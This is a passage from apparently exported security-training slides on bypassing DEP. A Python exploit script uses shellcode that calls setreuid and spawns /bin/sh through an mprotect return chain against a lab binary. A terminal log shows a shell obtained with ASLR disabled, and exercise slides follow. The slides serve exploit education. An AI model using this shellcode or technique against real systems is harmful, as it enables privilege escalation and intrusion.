target = "ch5-mp" target_file = "/tmp/f" overflow_len = 0x74 mprotect_addr = 0xb7f31e00 buf_addr = 0xbffffce8 stack_page = buf_addr & -0x1000 page_size = 0x1000 rwe_perms = 0x7 target_path = os.path.abspath(target) # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) sc = ("x6ax31x58x99xcdx80x89xc3x89xc1x6ax46" "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68" "x2fx2fx62x69x89xe3x89xd1xcdx80") ex = sc ex += 'A'*(overflow_len - len(sc)) ex += s.pack("<I", mprotect_addr) ex += s.pack("<I", buf_addr) ex += s.pack("<I", stack_page) ex += s.pack("<I", page_size) ex += s.pack("<I", rwe_perms) f = open(target_file, "wb") f.write(s.pack("<I", len(ex))) f.write(ex) f.close() os.execve(target_path, (target_path, target_file), os.environ) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 26
27.
Test cisco@kali:~/src/seccon/ch5$ sudo
sysctl -a | grep -i randomize kernel.randomize_va_space = 0 cisco@kali:~/src/seccon/ch5$ readelf -l ch5-mp | grep STACK GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 cisco@kali:~/src/seccon/ch5$ invoke ch5-mp.py Data is 136 bytes long Got data from file: j1X?̀?É?jFX̀? Rhn/shh//bi???̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA $ exit We changed a stack page to RWE using mprotect We redirected to our shellcode © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 27
28.
Take away ©
2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 28
29.
Conclusion DEP
is trivial to bypass without ASLR You can run your shellcode in some circumstances Mprotect is nice for runtime memory permission changes Mprotect trick doesn’t work on grsec kernels © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 29
30.
Exercise © 2013-2014
Cisco and/or its affiliates. All rights reserved. Cisco Confidential 30
31.
Exercise time
Exploit ch5 using standard ret2libc() => call system() Do the same thing, but print some greeting before your shellcode. Exit cleanly Pick your favorite shellcode. Exploit ch5-mp using mprotect() trick Can you make ch5-mp more reliable? How? Hint: what is that useless pointer there for? Why doesn’t the above work? Read the ABI again ;) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 31
Notes de l'éditeur
----- Meeting Notes (28/04/2014 16:14) ----- make clearer
----- Meeting Notes (28/04/2014 16:14) ----- Put comment or diagram